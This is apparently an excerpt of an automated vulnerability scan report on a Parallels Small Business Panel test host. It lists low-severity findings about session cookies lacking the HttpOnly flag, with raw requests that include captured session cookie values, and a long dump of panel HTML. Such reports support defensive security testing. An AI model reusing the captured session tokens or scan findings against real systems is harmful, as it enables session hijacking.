<th style="width:1%;"><div><span></span></div></th>
<th style="width:1%;text-align:center;" scope="col"><div>Edit</div></th>
</tr>
<tr class="list-table-row">
<td style="width:1%;"><input type="checkbox" name="objectIds[]" class="check" value="1"></td>
<td></td>
<td style="text-align:;">Category1</td>
<td style="text-align:;">0</td>
<td style="width:1%; text-align:center;"></td>
<td style="width:1%; text-align:center;"><a href="#" onclick="
                           var action    = document.getElementById('viewAction');
                           var form    = document.forms['SB_WizardForm'];
                           form.action = action.value+'/Modules/ImageGallery/Category/Down?id=1';
                       
                           self.sbApplyChangesObject.registerForcedSaving();
                           sbNavigationObject.go();
                       "><img style="border-width:0px;width:16px;height:16px" src="/skins/WinXPReloadedCompact/images/sequence-down.gif"></a></td>
<td style="width:1%; text-align:center;"><a href="#" onclick="
                       self.sbApplyChangesObject.registerForcedSaving();
                       sbNavigationObject.go('/Wizard/Edit/Modules/ImageGallery/Category/Edit?id=1');
                   "><img style="border-width:0px;width:16px;height:16px" src="/skins/WinXPReloadedCompact/icons/editsiteinwizard.png"></a></td>
</tr>
<tr class="list-table-row-alter">
<td style="width:1%;"><input type="checkbox" name="objectIds[]" class="check" value="2"></td>
<td></td>
<td style="text-align:;">Category2</td>
<td style="text-align:;">0</td>
<td style="width:1%; text-align:center;"><a href="#" onclick="
                           var action    = document.getElementById('viewAction');
                           var form    = document.forms['SB_WizardForm'];
                           form.action = action.value+'/Modules/ImageGallery/Category/Up?id=2';
                       
                           self.sbApplyChangesObject.registerForcedSaving();
                           sbNavigationObject.go();
                       "><img style="border-width:0px;width:16px;height:16px" src="/skins/WinXPReloadedCompact/images/sequence-up.gif"></a></td>
<td style="width:1%; text-align:center;"></td>
<td style="width:1%; text-align:center;"><a href="#" onclick="
                       self.sbApplyChangesObject.registerForcedSaving();
                       sbNavigationObject.go('/Wizard/Edit/Modules/ImageGallery/Category/Edit?id=2');
                   "><img style="border-width:0px;width:16px;height:16px" src="/skins/WinXPReloadedCompact/icons/editsiteinwizard.png"></a></td>
</tr>
</table></div>
<script language="javascript">
function pagedListGotoPage(tab, pageNum) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.tab.value = tab;
   form.pageNum.value = pageNum;
   form.submit();
}
function pagedListSetPageSize(tab, pageSize) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.tab.value = tab;
   form.pageNum.value = 1;
   form.pageSize.value = pageSize;
   form.submit();
}
</script><table width="100%" cellspacing="0" cellpadding="0" border="0" class="list-pager-container"><tr>
<td class="list-pager-total-area">2..records total</td>
<td class="list-pager-go-area"></td>
<td class="list-pager-numbers-area">Number of entries per page:..
       <a href="javascript:pagedListSetPageSize('categories',5);">5</a>..
       <strong>10</strong>..
       <a href="javascript:pagedListSetPageSize('categories',25);">25</a>..
       <a href="javascript:pagedListSetPageSize('categories',100);">100</a>
</td>
</tr></table>
<script type="text/javascript" language="javascript">
                       observeCheckboxesClick('Ids[]',
                           'Top'
                       );
                       observeListRowsHighlight();
                   </script>
</div>
</fieldset>
</div>
<div style="display:none;" id="settingsContent"></div>
</td></tr>
<tr class="sb-formtablefooter"><th style="width: 100%;">..</th></tr>
</table>
<script type="text/javascript">imgPath='/skins/WinXPReloadedCompact/images/';</script><script type="text/javascript" src="/js/tabpanel.js?5.0.0.2009110318"></script><script type="text/javascript">sb_panel = new TabPanel();
           sb_panel.setupAllPages();
       </script>
</td></tr></table>
</td>
</tr></table></td></tr></table>
</td></tr>
<tr id="TRFooter"><td colspan="2"><table cellpadding="0" cellspacing="0" border="0" width="100%" class="sb-footer-container"><tr><td class="sb-footer"><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%;"><tr>
<td><table border="0" cellpadding="0" cellspacing="5" style="height: 100%; padding: 5px 0;"><tr><td class="sb-footer-text" style="white-space: nowrap;padding-left: 15px;">
                                       .... Copyright 2004-2009 Parallels All Rights Reserved.</td></tr></table></td>
<td align="right" style="padding-right: 10px;"><table cellpadding="0" cellspacing="0"><tr>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" value="Back" style="cursor:pointer;" onclick="return sbNavigationObject.go('/Wizard/Pages');"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/go_back_l.gif"></td>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/go_bg.gif);padding-left:15px;padding-right:5px;"><img src="/skins/WinXPReloadedCompact/images/go_back_bullet.gif"></td>
<td align="center" class="sb-go-text" style="padding: 0 15px 0 5px; width:40px; background-image:url(/skins/WinXPReloadedCompact/images/go_bg.gif);">Back</td>
<td><img src="/skins/WinXPReloadedCompact/images/go_back_r.gif"></td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" value="Preview" style="cursor: pointer;" onclick="sbNavigationObject.setViewParam('preview','show');sbNavigationObject.go('/Wizard/Edit/Modules/ImageGallery/Category/Edit');sbNavigationObject.unsetViewParam('preview');"><tr>
<td style="width:0px;"></td>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/go_bg.gif);padding-left:15px;padding-right:5px;"><img src="/skins/WinXPReloadedCompact/images/go_preview_bullet.gif"></td>
<td align="center" class="sb-go-text" style="padding: 0 15px 0 5px; width:40px; background-image:url(/skins/WinXPReloadedCompact/images/go_bg.gif);">Preview</td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" value="Forward" style="cursor:pointer;" onclick="return sbNavigationObject.go('/Wizard/Publish');"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/go_next_l.gif" border="0"></td>
<td background="/skins/WinXPReloadedCompact/images/go_bg.gif" style="padding-left:15px;padding-right:5px;"><img src="/skins/WinXPReloadedCompact/images/go_next_bullet.gif" border="0"></td>
<td align="center" class="sb-go-text" style="padding: 0 15px 0 5px; width:40px; background-image:url(/skins/WinXPReloadedCompact/images/go_bg.gif);">Next</td>
<td><img src="/skins/WinXPReloadedCompact/images/go_next_r.gif" border="0"></td>
</tr></table></td>
</tr></table></td>
</tr></table></td></tr></table></td></tr>
</table>
</form>
</body>
</html>

3.15. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/Image/Edit  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /Wizard/Edit/Modules/ImageGallery/Image/Edit

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Wizard/Edit/Modules/ImageGallery/Image/Edit HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 04:58:43 GMT
Connection: close


3.16. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/ImageUpload  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /Wizard/Edit/Modules/ImageGallery/ImageUpload

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Wizard/Edit/Modules/ImageGallery/ImageUpload HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 04:58:40 GMT
Connection: close


3.17. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/MultiImagesUpload  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /Wizard/Edit/Modules/ImageGallery/MultiImagesUpload

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Wizard/Edit/Modules/ImageGallery/MultiImagesUpload HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 04:58:44 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link href="/skins/common.css?5.0.0.2009110318" type="text/css" rel="stylesheet">
<link href="/skins/WinXPReloadedCompact/style.css?5.0.0.2009110318" type="text/css" rel="stylesheet">
<link href="/skins/style_ext.css?5.0.0.2009110318" type="text/css" rel="stylesheet">
<link rel="shortcut icon" href="/favicon.ico?5.0.0.2009110318">
<script type="text/javascript" src="/js/externals/prototype.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/externals/scriptaculous/scriptaculous.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/Sb.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/Sb/Console.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/util.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/preloader.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/Sb/Cookie.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/common.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/validator.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/SbAjaxRequest.js?5.0.0.2009110318"></script><style type="text/css">img{ behavior:url('/images/pngbehavior.htc?5.0.0.2009110318'); }</style>
<title>Edit -
       Parallels Small Business Panel</title>
</head>
<body onload="ProcessOnloadActions();">
<script type="text/javascript">
                   if ('1' == '') {
                       Sb.Console.enable();

                       
                   }
                                   
                   Sb.Cookie.set('testCookie', 'test', '', '/');

                   if ('test' != Sb.Cookie.get('testCookie')) {
                       document.location.href = "/NoCookies";
                   }

                   // define global variables
                   sbSkinPath = '/skins/WinXPReloadedCompact';
                   sbBrowserEngine = 'MSIE';
                   sbBaseUrl = '';
                   sbVersion = '5.0.0';
                   sbBuild = '2009110318';
               </script><script src="/js/locale.js?5.0.0.2009110318" type="text/javascript"></script><script type="text/javascript" language="javascript">
               SbAppendLocaleKey('HIDE-SITE-MAP', 'Hide Site Map');
           
               SbAppendLocaleKey('SHOW-SITE-MAP', 'Show Site Map');
           
               SbAppendLocaleKey('EMPTY-PAGE-TITLE', 'Please provide the page title.');
           
               SbAppendLocaleKey('EMPTY-PAGE-FILE-NAME', 'Please provide a page file name.');
           
               SbAppendLocaleKey('INVALID-PAGE-FILE-NAME', 'Page file name can contain only Latin characters, digits, dashes, and underscores.');
           
               SbAppendLocaleKey('DUPLICATE-PAGE-FILE-NAME', 'Page file name must be unique within each site structure. Also, you cannot name a page \'index\' because it is a reserved name.');
           
               SbAppendLocaleKey('SELECT-FOR-DELETE', 'Please select at least one element.');
           
               SbAppendLocaleKey('SURE-TO-DELETE', 'Selected items will be deleted permanently. Continue?');
           
               SbAppendLocaleKey('EMPTY-CATEGORY-THUMB-WIDTH', 'Please provide a value for the Category image width parameter.');
           
               SbAppendLocaleKey('NOT-INT-CATEGORY-THUMB-WIDTH', 'Invalid value of the Category image width parameter. Please enter an integer number.');
           
               SbAppendLocaleKey('CATEGORY-MAX-THUMB-WIDTH', 'The maximum allowed value for the Category image width parameter is 2048 (px).');
           
               SbAppendLocaleKey('EMPTY-IMAGE-THUMB-WIDTH', 'Please provide a value for the Image thumb width parameter.');
           
               SbAppendLocaleKey('NOT-INT-IMAGE-THUMB-WIDTH', 'Invalid value of the Image thumb width parameter. It must be an integer number.');
           
               SbAppendLocaleKey('IMAGE-MAX-THUMB-WIDTH', 'The maximum allowed value for the Image thumb width parameter is 2048 (px).');
           
               SbAppendLocaleKey('EMPTY-IMAGE-THUMB-HEIGHT', 'Please provide a value for the Image thumb height parameter.');
           
               SbAppendLocaleKey('NOT-INT-IMAGE-THUMB-HEIGHT', 'Invalid value of the Image thumb height parameter. It must be an integer number.');
           
               SbAppendLocaleKey('IMAGE-MAX-HEIGHT-WIDTH', 'The maximum allowed value for the Image thumb height parameter is 1536 (px).');
           
               SbAppendLocaleKey('EMPTY-PREVIEW-THUMB-WIDTH', 'Please provide a value for the Preview thumb width parameter.');
           
               SbAppendLocaleKey('NOT-INT-PREVIEW-THUMB-WIDTH', 'Invalid value of the Preview thumb width parameter. It must be an integer number.');
           
               SbAppendLocaleKey('PREVIEW-MAX-WIDTH-WIDTH', 'The maximum allowed value for the Preview thumb width parameter is 2048 (px).');
           
               SbAppendLocaleKey('EMPTY-IMAGES-PER-PAGE', 'Please provide a value for the Images per page parameter.');
           
               SbAppendLocaleKey('NOT-INT-IMAGES-PER-PAGE', 'Invalid value of the of the Images per page parameter. It must be an integer number.');
           
               SbAppendLocaleKey('PROGRESS', 'Progress');
           
               SbAppendLocaleKey('ALERT', 'Alert');
           
               SbAppendLocaleKey('FILE-NOT-FOUND', 'File not found');
           
               SbAppendLocaleKey('CANNOT-RESIZE-FILE', 'Cannot resize image');
           
               SbAppendLocaleKey('HTTP-ERROR', 'HTTP request error');
           
               SbAppendLocaleKey('FURIOUS-ERROR-MESSAGE', 'Cannot upload the remaining images: click \'Retry\' to repeat the operation or click \'OK\' to close the Multiple Image Upload window.');
           
               SbAppendLocaleKey('EMPTY-CATEGORY-MESSAGE', 'Please provide a name for the category.');
           
               SbAppendLocaleKey('NO-IMAGES-SELECTED', 'Please select at least one image.');
           
               SbAppendLocaleKey('PREVIEW-POPUP-BLOCKED', 'The site preview window was blocked by your browser. To preview the site, please allow pop-up windows for this domain.');
           
               SbAppendLocaleKey('CONTENT-MODIFIED', 'Modified');
           
               SbAppendLocaleKey('AJAX-REQUEST-LOADING', 'Loading...');
           
               SbAppendLocaleKey('AJAX-REQUEST-WAIT', 'Please wait.');
           </script><div id="fullScreenDiv" style="position:absolute; background: #ffffff; filter:alpha(opacity=0); opacity: 0;"></div>
<div id="disablerDiv" style="display: none; filter:alpha(opacity=40); background-color: #FFFFFF; opacity: 0.4;"></div>
<table id="SB_loader_table" cellpadding="0" cellspacing="0" border="0" width="100%" height="100%" style="display:none;z-index:1098;position:absolute;"><tr><td id="SB_loader_td" style="filter:alpha(opacity=40);background-color:#ffffff;-moz-opacity:0.40;"></td></tr></table>
<div id="DIV_DESKTOP" style="width:1%;height:1%;display:none;text-align:center;position:absolute;left:0px;top:0px;z-index:1001;"></div>
<div id="loader" style="height:56px;width:320px;display:none;position:absolute;left:0px;top:0px;z-index:1100;"><table border="0" cellspacing="3" cellpadding="3" width="100%" height="100%" class="sb-preloader-table"><tr>
<td align="center" valign="middle" width="15%"><img id="ImagePreloader" src="/skins/WinXPReloadedCompact/images/loading.gif" style="border-width:0px;"></td>
<td align="left" valign="middle"><span id="LabelPreloader"><strong>Please wait.</strong><br><strong>Loading...</strong></span></td>
</tr></table></div>
<iframe src="/blank.html" id="SB_loader_iframe" name="SB_loader_iframe" frameborder="0" scrolling="no" style="border-width:0;display:none;z-index:1099;position:absolute;height:56px;width:320px;"></iframe><script type="text/javascript" language="javascript"><!--
               var sbPreloader = new SbPreloader();
               
                       sbPreloader.show();
                   
           //--></script><script type="text/javascript">
                   sb_status = null;
               </script><script type="text/javascript" language="javascript" src="/js/modal_form.js?5.0.0.2009110318"></script><div id="SbApplyChangesBackground" style="background-color:black; filter:alpha(opacity=15); opacity: 0.15; z-index:101; position:absolute; overflow:hidden; display:none;"></div>
<div id="SbApplyChanges" style="width:300px; height:145px; display:none;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="height: 100%;"><table cellspacing="0" cellpadding="0" style="width:100%; height: 100%;"><tr>
<td style="width:100%; background-color:white; vertical-align:top;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="cursor:pointer; user-select:none; -moz-user-select:none; border:solid 1px #E3E3E3; width: 100%;"><table cellspacing="0" cellpadding="2" border="0" class="sb-modalbox-header" style="width:100%; border-collapse:collapse;"><tr>
<td id="SbApplyChangesHeader" style="width:99%; white-space:nowrap; padding-left:6px;"><span id="SbApplyChangesTitle" class="sb-modalbox-header-text" style="padding-left:6px; vertical-align:middle;">Apply Changes</span></td>
<td align="right" style="width:1%; padding: 4px 4px 4px 6px;" onclick="sbApplyChangesObject.hide();"><img width="16" height="16" src="/skins/WinXPReloadedCompact/icons/close.png" alt="Close dialog" style="border-width:0px; display:inline; vertical-align:middle;"></td>
</tr></table></td></tr>
<tr><td style="vertical-align:top;"></td></tr>
<tr><td style="width:100%; height:100%;padding: 10px;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;"><tr><td valign="top"><table width="80%" cellspacing="0" cellpadding="0" border="0" align="center">
<tr><td colspan="3" style="padding-bottom:10px; padding-left:10px;"><table cellpadding="0" cellspacing="0" border="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/applychanges.gif" border="0"></td>
<td class="sb-text" style="padding-left:30px;">Apply changes?</td>
</tr></table></td></tr>
<tr>
<td align="center" width="33%" style="padding-right:15px;"><table align="center" onclick="return sbApplyChangesObject.yes(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Yes</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
<td align="center" width="34%"><table align="center" onclick="return sbApplyChangesObject.no(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">No</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
<td align="center" width="33%" style="padding-left:15px;"><table align="center" onclick="sbApplyChangesObject.cancel(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Cancel</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
</tr>
</table></td></tr></table></td></tr>
</table></td>
<td style="width: 10px; padding-top:10px; height:100%;"><div style="width:10px; height:100%; filter:alpha(opacity=25); background-color:black; opacity:0.25; display: table;"><span></span></div></td>
</tr></table></td></tr>
<tr><td style="padding-left:10px; height: 10px;"><div style="width:100%; height:10px; filter:alpha(opacity=25); background-color:black; opacity:0.25;"><span></span></div></td></tr>
</table></div>
<script type="text/javascript" language="javascript">
           SbInitModalForm('SbApplyChanges');
       </script><script type="text/javascript" language="javascript" src="/js/apply_changes.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript"><!--
               sbApplyChangesObject = new SB_ApplyChanges('SbApplyChanges');
           //--></script><script type="text/javascript" language="javascript" src="/js/modal_form.js?5.0.0.2009110318"></script><div id="StatusDetailedBackground" style="background-color:black; filter:alpha(opacity=15); opacity: 0.15; z-index:101; position:absolute; overflow:hidden; display:none;"></div>
<div id="StatusDetailed" style="width: 750px; height: 370px; display: none;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="height: 100%;"><table cellspacing="0" cellpadding="0" style="width:100%; height: 100%;"><tr>
<td style="width:100%; background-color:white; vertical-align:top;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="cursor:pointer; user-select:none; -moz-user-select:none; border:solid 1px #E3E3E3; width: 100%;"><table cellspacing="0" cellpadding="2" border="0" class="sb-modalbox-header" style="width:100%; border-collapse:collapse;"><tr>
<td id="StatusDetailedHeader" style="width:99%; white-space:nowrap; padding-left:6px;"><span id="StatusDetailedTitle" class="sb-modalbox-header-text" style="padding-left:6px; vertical-align:middle;">Detailed status messages</span></td>
<td align="right" style="width:1%; padding: 4px 4px 4px 6px;" onclick="sb_status.hideDetails();return false;"><img width="16" height="16" src="/skins/WinXPReloadedCompact/icons/close.png" alt="" style="border-width:0px; display:inline; vertical-align:middle;"></td>
</tr></table></td></tr>
<tr><td style="vertical-align:top;"></td></tr>
<tr><td style="width:100%; height:100%;padding: 10px;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;"><tr><td valign="top"><div>
<div style="margin-bottom: 7px;"><table cellspacing="1" border="0" style="width: 720px;" align="center"><tr>
<td><table cellspacing="0" cellpadding="0" border="0" style="border-collapse: collapse;"><tr>
<td valign="middle" class="sb-text" style="padding-right: 5px;">View</td>
<td valign="middle" style="padding-right: 5px;"><select class="sb-text" onchange="sb_status.filterDetails(this.value)"><option value="0">All messages</option>
<option value="1">Information</option>
<option value="2">Errors</option>
<option value="3">Warnings</option></select></td>
</tr></table></td>
<td align="right"><table align="right" onclick="sb_status.clearDetails(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Clear</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
</tr></table></div>
<div style="height: 180px; border-style: solid; border-width: 0px; width: 100%; overflow-y: auto; overflow-x: auto; overflow: auto; float: left;"><table cellspacing="1" border="0" style="width: 100%;" align="center" id="StatusDetailedMessages">
<tr class="sb-gridview-header" align="left" style="height: 24px; white-space: nowrap;">
<th style="padding-left: 4px; padding-right: 4px; text-align: left; width: 15px;" scope="col">#</th>
<th style="padding-left: 4px; padding-right: 4px; text-align: center; width: 25px;" scope="col">S</th>
<th style="padding-left: 4px; padding-right: 4px;" scope="col">Message</th>
</tr>
<tr class="0" style="display: none;">
<td style="padding-left: 4px; padding-right: 4px; text-align: left; width: 15px;" class="sb-gridtext">..</td>
<td style="padding-left: 4px; padding-right: 4px; text-align: center; width: 25px;" class="sb-gridtext">..</td>
<td style="padding-left: 4px; padding-right: 4px;" class="sb-gridtext">..</td>
</tr>
<tr class="1" style="display: none;">
<td style="padding-left: 4px; padding-right: 4px; text-align: left; font-wight: bold; width: 15px;" class="sb-gridtext">..</td>
<td style="padding-left: 4px; padding-right: 4px; text-align: center; width: 25px;" class="sb-gridtext">..</td>
<td style="padding-left: 4px; padding-right: 4px;" class="sb-gridtext">..</td>
</tr>
</table></div>
<div style="padding-top: 7px; width: 100%;"><table align="right" onclick="sb_status.hideDetails();return false; return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Close</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></div>
</div></td></tr></table></td></tr>
</table></td>
<td style="width: 10px; padding-top:10px; height:100%;"><div style="width:10px; height:100%; filter:alpha(opacity=25); background-color:black; opacity:0.25; display: table;"><span></span></div></td>
</tr></table></td></tr>
<tr><td style="padding-left:10px; height: 10px;"><div style="width:100%; height:10px; filter:alpha(opacity=25); background-color:black; opacity:0.25;"><span></span></div></td></tr>
</table></div>
<script type="text/javascript" language="javascript">
           SbInitModalForm('StatusDetailed');
       </script><script type="text/javascript" language="javascript" src="/js/wizard.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript" src="/js/navigation.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript">
           var baseUrl='';
           var sbNavigationObject;
           sbNavigationObject = new SB_Navigation('SB_WizardForm', '/Wizard/Edit/Modules/ImageGallery');
           </script><form name="SB_WizardForm" method="post" enctype="multipart/form-data" onsubmit="return wizardFormSubmit();" action="/Wizard/Edit/Modules/ImageGallery">
<script type="text/javascript" language="javascript" src="/js/modal_form.js?5.0.0.2009110318"></script><div id="MultipleUploadDialogIdBackground" style="background-color:black; filter:alpha(opacity=15); opacity: 0.15; z-index:101; position:absolute; overflow:hidden; display:none;"></div>
<div id="MultipleUploadDialogId" style="width: 960px;height: 650px;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="height: 100%;"><table cellspacing="0" cellpadding="0" style="width:100%; height: 100%;"><tr>
<td style="width:100%; background-color:white; vertical-align:top;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="cursor:pointer; user-select:none; -moz-user-select:none; border:solid 1px #E3E3E3; width: 100%;"><table cellspacing="0" cellpadding="2" border="0" class="sb-modalbox-header" style="width:100%; border-collapse:collapse;"><tr>
<td id="MultipleUploadDialogIdHeader" style="width:99%; white-space:nowrap; padding-left:6px;"><span id="MultipleUploadDialogIdTitle" class="sb-modalbox-header-text" style="padding-left:6px; vertical-align:middle;">Multiple Image Upload</span></td>
<td align="right" style="width:1%; padding: 4px 4px 4px 6px;" onclick="sbNavigationObject.go();"><img width="16" height="16" src="/skins/WinXPReloadedCompact/icons/close.png" alt="" style="border-width:0px; display:inline; vertical-align:middle;"></td>
</tr></table></td></tr>
<tr><td style="vertical-align:top;"></td></tr>
<tr><td style="width:100%; height:100%;padding: 10px;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;"><tr><td valign="top">
<script type="text/javascript" src="/modules/ImageGallery/js/activeXUpload.js?5.0.0.2009110318"></script><table style="width:100%;height:80%"><tr><td>
<object classid="clsid:5220CB21-C88D-11cf-B347-00AA00A28331" codebase="/applet/SWHTTPUploaderProj.cab"></object><object classid="clsid:A8B02DCA-7648-46D6-95A8-B84EC80CA49D" name="JamShellLinkX" id="JamShellLinkX" align="left" codebase="/applet/SWHTTPUploaderProj.cab"></object><object classid="clsid:7306A0C7-E97C-46CD-BBAD-0DD72CFD32CB" id="FileUploader" name="FileUploader" style="display: none;" codebase="/applet/SWHTTPUploaderProj.cab"></object><table width="100%"><tr class="sb-edit-panel-block">
